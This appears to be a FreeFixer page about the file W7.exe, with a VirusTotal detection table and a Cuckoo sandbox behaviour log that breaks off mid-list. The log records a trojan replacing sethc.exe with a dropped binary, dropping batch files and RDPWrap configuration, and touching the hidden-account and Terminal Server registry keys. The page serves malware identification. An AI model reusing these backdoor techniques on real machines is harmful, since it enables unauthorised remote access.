What is W7.exe?
W7.exe is usually located in the 'c:\downloads\' folder.
Some of the anti-virus scanners at VirusTotal detected W7.exe.
If you have additional information about the file, please share it with the FreeFixer users by posting a comment at the bottom of this page.
Digital signatures [?]
W7.exe is not signed.
VirusTotal report
47 of the 66 anti-virus programs at VirusTotal detected the W7.exe file. That's a 71% detection rate.
| Scanner | Detection Name |
|---|---|
| Ad-Aware | Dropped:Trojan.GenericKD.31902899 |
| AegisLab | Trojan.Win32.Generic.lCIq |
| AhnLab-V3 | Malware/Win32.RL_Generic.R264226 |
| Alibaba | Trojan:Win32/Adduser.8c5af562 |
| Antiy-AVL | RiskWare[RemoteAdmin]/Win32.RDPWrap |
| Arcabit | Trojan.Generic.D1E6CCB3 |
| Avast | Win32:Malware-gen |
| AVG | Win32:Malware-gen |
| Avira | SPR/RemoteAdmin.AO |
| Baidu | BAT.Trojan.Adduser.d |
| BitDefender | Dropped:Trojan.GenericKD.31902899 |
| CAT-QuickHeal | BAT.Agent.CQ |
| ClamAV | Win.Trojan.Darkkomet-6904263-0 |
| Cybereason | malicious.07da97 |
| Cyren | W32/Trojan.ILIQ-0186 |
| DrWeb | Program.Rdpwrap.4 |
| Emsisoft | Dropped:Trojan.GenericKD.31902899 (B) |
| Endgame | malicious (moderate confidence) |
| ESET-NOD32 | BAT/RA-based.GC |
| F-Secure | Trojan.TR/Dropper.Gen |
| FireEye | Generic.mg.e3f4e3e07da97cd7 |
| Fortinet | Riskware/RDPWrap |
| GData | Dropped:Trojan.GenericKD.31902899 |
| Ikarus | Trojan.BAT.Adduser |
| Invincea | heuristic |
| Jiangmin | RemoteAdmin.RDPWrap.r |
| K7AntiVirus | RemoteTool ( 0053f8421 ) |
| K7GW | RemoteTool ( 0053f8421 ) |
| Kaspersky | not-a-virus:RemoteAdmin.Win32.RDPWrap.h |
| Malwarebytes | RiskWare.RemoteAdmin |
| MAX | malware (ai score=96) |
| McAfee | Artemis!E3F4E3E07DA9 |
| McAfee-GW-Edition | RDN/Generic.sfx |
| Microsoft | Trojan:Win32/Tiggre!rfn |
| MicroWorld-eScan | Dropped:Trojan.GenericKD.31902899 |
| NANO-Antivirus | Trojan.Script.Agent.dddleu |
| Paloalto | generic.ml |
| Panda | Trj/CI.A |
| Qihoo-360 | Win32/Virus.RemoteAdmin.eb2 |
| Rising | Malware.Undefined!8.C (CLOUD) |
| Sophos | Mal/Generic-S |
| Symantec | SMG.Heur!gen |
| Tencent | Win32.Trojan.Dropper.Amca |
| Trapmine | malicious.moderate.ml.score |
| Yandex | Riskware.RemoteAdmin! |
| Zillya | Tool.RemoteAdmin.Win32.5 |
| ZoneAlarm | not-a-virus:RemoteAdmin.Win32.RDPWrap.h |
Sandbox Report
The following information was gathered by executing the file inside Cuckoo Sandbox.
Summary
Successfully executed process in sandbox.
Summary
{
"guid": [
"{432a1da5-3888-4b9a-a734-cff1e448c5b9}",
"{2933bf93-7b36-11d2-b20e-00c04f983e60}",
"{00000003-0000-0000-c000-000000000046}",
"{00bb2763-6a77-11d0-a535-00c04fd7d062}",
"{44aca674-e8fc-11d0-a07c-00c04fb68820}",
"{ea4a0a43-1c8f-4c7b-a4b1-28ecbd96ba8c}",
"{8bc3f05e-d86b-11d0-a075-00c04fb68820}",
"{2933bf94-7b36-11d2-b20e-00c04f983e60}",
"{eb082ba1-df8a-46be-82f3-35bf9e9be52f}",
"{00bb2765-6a77-11d0-a535-00c04fd7d062}",
"{78103fb7-aed7-4066-8bcd-30bb27b02331}",
"{00000000-0000-0000-c000-000000000046}",
"{4590f811-1d3a-11d0-891f-00aa004b2e24}",
"{0ca545c6-37ad-4a6c-bf92-9f7610067ef5}",
"{00000146-0000-0000-c000-000000000046}",
"{8d1c559d-84f0-4bb3-a7d5-56a7435a9ba6}",
"{674b6698-ee92-11d0-ad71-00c04fd8fdff}",
"{d5f569d0-593b-101a-b569-08002b2dbf7a}",
"{dc12a687-737f-11cf-884d-00aa004b2e24}",
"{00000323-0000-0000-c000-000000000046}",
"{5e078e03-8265-4bbe-9487-d242edbef910}",
"{e0483ba0-47ff-4d9c-a6d6-7741d0b195f7}",
"{f7898af5-cac4-4632-a2ec-da06e5111af2}",
"{07a1127b-18cc-422a-b988-e892600fcc74}",
"{304ce942-6e39-40d8-943a-b913c40c9cd4}",
"{f6d90f12-9c73-11d3-b32e-00c04f990bb4}",
"{f309ad18-d86a-11d0-a075-00c04fb68820}",
"{2933bf95-7b36-11d2-b20e-00c04f983e60}",
"{eac04bc0-3791-11d2-bb95-0060977b464c}",
"{855a71d0-e5cd-46de-9707-17f2bd1ed694}",
"{bfbf883a-cad7-11d3-a11b-00105a1f515a}",
"{bf0ec44a-c6ae-4bc5-a0ca-d33fa6c9c6c2}",
"{807c1e6c-1d00-453f-b920-b61bb7cdd997}",
"{7c857801-7381-11cf-884d-00aa004b2e24}",
"{03c036f1-a186-11d0-824a-00aa005b4383}",
"{4590f812-1d3a-11d0-891f-00aa004b2e24}"
],
"file_recreated": [
"\\Device\\Http\\Communication",
"\\Device\\KsecDD"
],
"directory_created": [
"C:\\Users\\cuck\\AppData",
"C:\\Documents and settings\\ontar",
"C:\\Users\\cuck\\AppData\\Local\\Temp",
"C:\\Users\\cuck",
"C:\\Users",
"C:\\Users\\cuck\\AppData\\Local",
"C:\\Windows\\System32\\dllcache"
],
"dll_loaded": [
"NETMSG",
"C:\\Windows\\system32\\bcryptprimitives.dll",
"RASMONTR.DLL",
"urlmon.dll",
"WSHELPER.DLL",
"RpcRtRemote.dll",
"GDI32.dll",
"HTTPAPI.dll",
"SHELL32.dll",
"kernel32.dll",
"COMDLG32.dll",
"CRYPTBASE.dll",
"C:\\Windows\\system32\\rsaenh.dll",
"C:\\Windows\\system32\\ole32.dll",
"NAPMONTR.DLL",
"dwmapi.dll",
"NSHIPSEC.DLL",
"C:\\Windows\\system32\\uxtheme.dll",
"UxTheme.dll",
"ntmarta.dll",
"API-MS-WIN-Service-Management-L2-1-0.dll",
"HNETMON.DLL",
"API-MS-WIN-Service-Management-L1-1-0.dll",
"C:\\Windows\\syswow64\\MSCTF.dll",
"KERNEL32.DLL",
"C:\\Windows\\SysWOW64\\bcryptprimitives.dll",
"API-MS-Win-Core-LocalRegistry-L1-1-0.dll",
"IFMON.DLL",
"API-MS-Win-Security-LSALookup-L1-1-0.dll",
"RPCNSH.DLL",
"comctl32",
"ole32.dll",
"COMCTL32.dll",
"CRYPTSP.dll",
"USER32.dll",
"IMM32.dll",
"NETIOHLP.DLL",
"NETTRACE.DLL",
"API-MS-WIN-Service-winsvc-L1-1-0.dll",
"riched32.dll",
"wininet.dll",
"ADVAPI32.dll",
"OLEAUT32.dll",
"C:\\Windows\\system32\\kernel32.dll",
"NSHWFP.DLL",
"RPCRT4.dll",
"NSHHTTP.DLL",
"comctl32.dll",
"WHHELPER.DLL",
"PEERDISTSH.DLL",
"SETUPAPI.dll",
"C:\\Windows\\system32\\shell32.dll",
"WCNNETSH.DLL",
"riched20.dll",
"GPAPI.dll",
"FWCFG.DLL",
"AUTHFWCFG.DLL",
"SAMLIB.dll",
"P2PNETSH.DLL",
"DOT3CFG.DLL",
"WWANCFG.DLL",
"WLANCFG.DLL",
"DHCPCMONITOR.DLL",
"rpcrt4.dll",
"COMCTL32.DLL",
"C:\\Windows\\system32\\wbem\\xml\\wmi2xml.dll",
"userenv.dll"
],
"file_opened": [
"",
"C:\\Windows\\System32\\FirewallAPI.dll",
"C:\\",
"\\\\?\\PIPE\\samr",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\903e0a66880cf6fbf4c39dff9735439084332daebaa2bdfede3b43fcbd60e46a.bin",
"\\Device\\NamedPipe\\",
"C:\\Windows\\System32\\en-US\\eapqec.dll.mui",
"C:\\Windows\\System32\\en-US\\ulib.dll.mui",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat",
"C:\\Windows\\System32\\dllcache\\sethc.exe",
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"\\\\?\\PIPE\\lsarpc",
"C:\\Windows\\System32\\wbem\\textvaluelist.xsl",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"C:\\Windows\\System32\\tsgqec.dll",
"C:\\Windows\\SysWOW64\\en-US\\cacls.exe.mui",
"C:\\Windows\\SysWOW64\\sethc.exe",
"C:\\Users\\ontar",
"C:\\Windows\\win.ini",
"C:\\Windows\\System32\\EAPQEC.DLL",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"C:\\Windows\\System32\\sethc.exe",
"C:\\Windows\\SysWOW64\\en-US\\sc.exe.mui",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\rdpwrap.ini",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls",
"C:\\Windows\\System32\\wbem\\XSL-Mappings.xml",
"C:\\Windows\\System32\\en-US\\napipsec.dll.mui",
"C:\\Windows\\System32\\termsrv.dll",
"C:\\Windows\\System32\\napipsec.dll",
"C:\\Windows\\System32\\rsaenh.dll"
],
"file_copied": [
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\ServicePackFiles\\i386\\sethc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\SysWOW64\\dllcache\\sethc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\SysWOW64\\sethc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\System32\\sethc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\drmsvc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\System32\\dllcache\\wsethc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\LastGood\\system32\\sethc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\System32\\dllcache\\sethc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\wpmsvc.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\LastGood\\SysWOW64\\sethc.exe"
]
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Strong Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\MAIN\\FeatureControl\\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\CacheMgr\\Republication",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.44.3.4!7",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\CacheMgr\\Republication",
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{0000897b-83df-4b96-be07-0fb58b01c4a4}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\PROTOCOLS\\Filter\\text\/xml",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\CTF\\TIP\\{0000897b-83df-4b96-be07-0fb58b01c4a4}\\LanguageProfile\\0x00000000\\{0001bea3-ed56-483d-a2e2-aeae25577436}",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ibhost.exe",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{3f5cc1b5-70f9-11e8-b07b-806e6f6e6963}\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\KnownClasses",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\PeerDist",
"HKEY_LOCAL_MACHINE\\Software",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc\\Extensions",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\HostedCache",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\AddIns",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\BFE",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\Connection",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor",
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\LSA\\AccessProviders",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\Service",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\PolicyProvider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\Publisher",
"HKEY_CURRENT_USER\\Software\\CodeGear\\Locales",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79621",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79623",
"HKEY_CURRENT_USER\\Software\\Borland\\Locales",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\Discovery",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DiscoveryManager",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS and Diffie-Hellman Cryptographic Provider",
"HKEY_CLASSES_ROOT\\PROTOCOLS\\Name-Space Handler\\",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{03B5835F-F03C-411B-9CE2-AA23E1171E36}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\iphlpsvc\\Config",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.47.1.1!7",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\(Default)",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}",
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE",
"HKEY_LOCAL_MACHINE\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{81D4E9C9-1D3B-41BC-9E6C-4B40BF79E35E}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip6\\Parameters",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\Protocol",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\HostedCache\\Connection",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\Compatibility\\903e0a66880cf6fbf4c39dff9735439084332daebaa2bdfede3b43fcbd60e46a.bin",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HandleMgr",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Cryptographic Provider v1.0",
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Publisher",
"HKEY_CURRENT_USER\\Interface\\{00000134-0000-0000-C000-000000000046}",
"HKEY_LOCAL_MACHINE\\Software\\CodeGear\\Locales",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Windows10Upgrade.exe",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\WBEM\\CIMOM",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32",
"HKEY_CURRENT_USER\\Software\\Microsoft\\CTF\\DirectSwitchHotkeys",
"HKEY_CLASSES_ROOT\\CLSID\\{00BB2763-6A77-11D0-A535-00C04FD7D062}\\InProcServer32",
"HKEY_LOCAL_MACHINE\\System\\Setup",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft RSA SChannel Cryptographic Provider",
"HKEY_CURRENT_USER\\Software\\Policies",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\Roaming",
"HKEY_CLASSES_ROOT\\CLSID\\{03C036F1-A186-11D0-824A-00AA005B4383}\\InProcServer32",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\HandleMgr",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{3f5cc1b6-70f9-11e8-b07b-806e6f6e6963}\\",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DiscoveryManager",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{00000134-0000-0000-C000-000000000046}\\ProxyStubClsid32",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{07EB03D6-B001-41DF-9192-BF9B841EE71F}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SharedAccess\\Epoch",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\PROTOCOLS\\Filter\\text\/xml",
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Service",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\\0",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\uddisrw.exe",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\Peers\\Connection",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_CURRENT_USER\\Software",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Status\\GPExtensions\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79619",
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\NapAgent\\LocalConfig",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Rpc",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79617",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
"HKEY_CURRENT_USER\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Setup",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft DH SChannel Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\Protocol",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced Cryptographic Provider v1.0",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\EOSNotify.exe",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\Peers\\Connection",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\CooperativeCaching",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\NetTrace\\Scenarios",
"HKEY_CLASSES_ROOT\\PROTOCOLS\\Name-Space Handler\\*\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\Download",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.47.1.1!7",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\CacheMgr\\Publication",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\CacheMgr\\Publication",
"HKEY_CURRENT_USER\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\UI",
"HKEY_CURRENT_USER\\Keyboard Layout\\Toggle",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{531FDEBF-9B4C-4A43-A2AA-960E8FCDC732}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced RSA and AES Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619",
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\LDAP",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes",
